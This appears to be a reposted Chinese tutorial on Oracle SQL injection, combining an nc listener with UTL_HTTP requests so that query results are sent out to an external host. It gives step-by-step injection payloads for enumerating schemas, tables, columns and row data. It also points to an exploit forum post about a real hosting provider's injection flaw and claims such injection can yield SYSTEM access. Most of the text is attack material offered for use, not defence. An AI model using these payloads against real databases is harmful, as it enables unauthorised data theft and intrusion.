Oracle注射技術——Oracle+nc注射
來源:易賢網(wǎng) 閱讀:1201 次 日期:2015-10-15 16:45:29
溫馨提示:易賢網(wǎng)小編為您整理了“Oracle注射技術——Oracle+nc注射”,方便廣大網(wǎng)友查閱!

首先外網(wǎng)nc監(jiān)聽對應的端口

and UTL_HTTP.request('外網(wǎng)ip:port/'||(sql語句))=1--

爆庫:

select owner from all_tables where rownum=1

select owner from all_tables where owner<>'第一個庫名'

and rownum=1

select owner from all_tables where owner<>'第一個庫名'

and owner<>'第二個'and rownum=1

select owner from all_tables where owner<>'第一個庫名'

and owner<>'第一個庫名' and rownum=1

以此論推

爆表:

select TABLE_NAME from all_tables where owner='庫名'

and rownum=1

select TABLE_NAME from all_tables where owner='庫名'

and rownum=1 and TABLE_NAME<>'表名1'

select TABLE_NAME from all_tables where owner='庫名'and rownum=1

and TABLE_NAME<>'表名1' and TABLE_NAME<>'表名2'

以此論推

爆列:

select COLUMN_NAME from user_tab_columns where table_name='表名'

and rownum=1

select COLUMN_NAME from user_tab_columns where table_name='表名'

and rownum=1 and COLUMN_NAME<>'第一個爆出的列名'

select COLUMN_NAME from user_tab_columns where table_name='表名'

and rownum=1 and COLUMN_NAME<>'第一個爆出的列名' and COLUMN_NAME<>'第二個爆出的列名'

爆內(nèi)容:

第一個內(nèi)容:select 列名 from 表名 where rownum=1

第二個內(nèi)容:select 列名 from 表名 where rownum=1 and 列名<>'第一個值'

第三個內(nèi)容:select 列名 from 表名 where rownum=1 and 列名<>'第一個值' and 列名<>'第二個值'

以此論推

現(xiàn)在大家轉過頭來看下“萬網(wǎng)的尷尬-萬網(wǎng)ORACLE注入漏洞曝光http://bbs.exploits.com.cn/read.php?tid-144.html

是不是很明了了...o(∩_∩)o...哈哈

注:

1:在windows環(huán)境下,oracle是以服務的形式啟動的,這樣通過web注射就可以直接獲得system權限(此部分內(nèi)容正在整理測試階段中,以供給大家更直觀、簡潔、有效的參考資料

2:針對unix和linux操作系統(tǒng)方面對于Oracle也會作出分析,相信Oracle注射將會成為轉入高級Hack入侵的橋梁

更多信息請查看IT技術專欄

更多信息請查看數(shù)據(jù)庫
易賢網(wǎng)手機網(wǎng)站地址:Oracle注射技術——Oracle+nc注射

2026國考·省考課程試聽報名

  • 報班類型
  • 姓名
  • 手機號
  • 驗證碼
關于我們 | 聯(lián)系我們 | 人才招聘 | 網(wǎng)站聲明 | 網(wǎng)站幫助 | 非正式的簡要咨詢 | 簡要咨詢須知 | 新媒體/短視頻平臺 | 手機站點 | 投訴建議
工業(yè)和信息化部備案號:滇ICP備2023014141號-1 云南省教育廳備案號:云教ICP備0901021 滇公網(wǎng)安備53010202001879號 人力資源服務許可證:(云)人服證字(2023)第0102001523號
聯(lián)系電話:0871-65099533/13759567129 獲取招聘考試信息及咨詢關注公眾號:hfpxwx
咨詢QQ:1093837350(9:00—18:00)版權所有:易賢網(wǎng)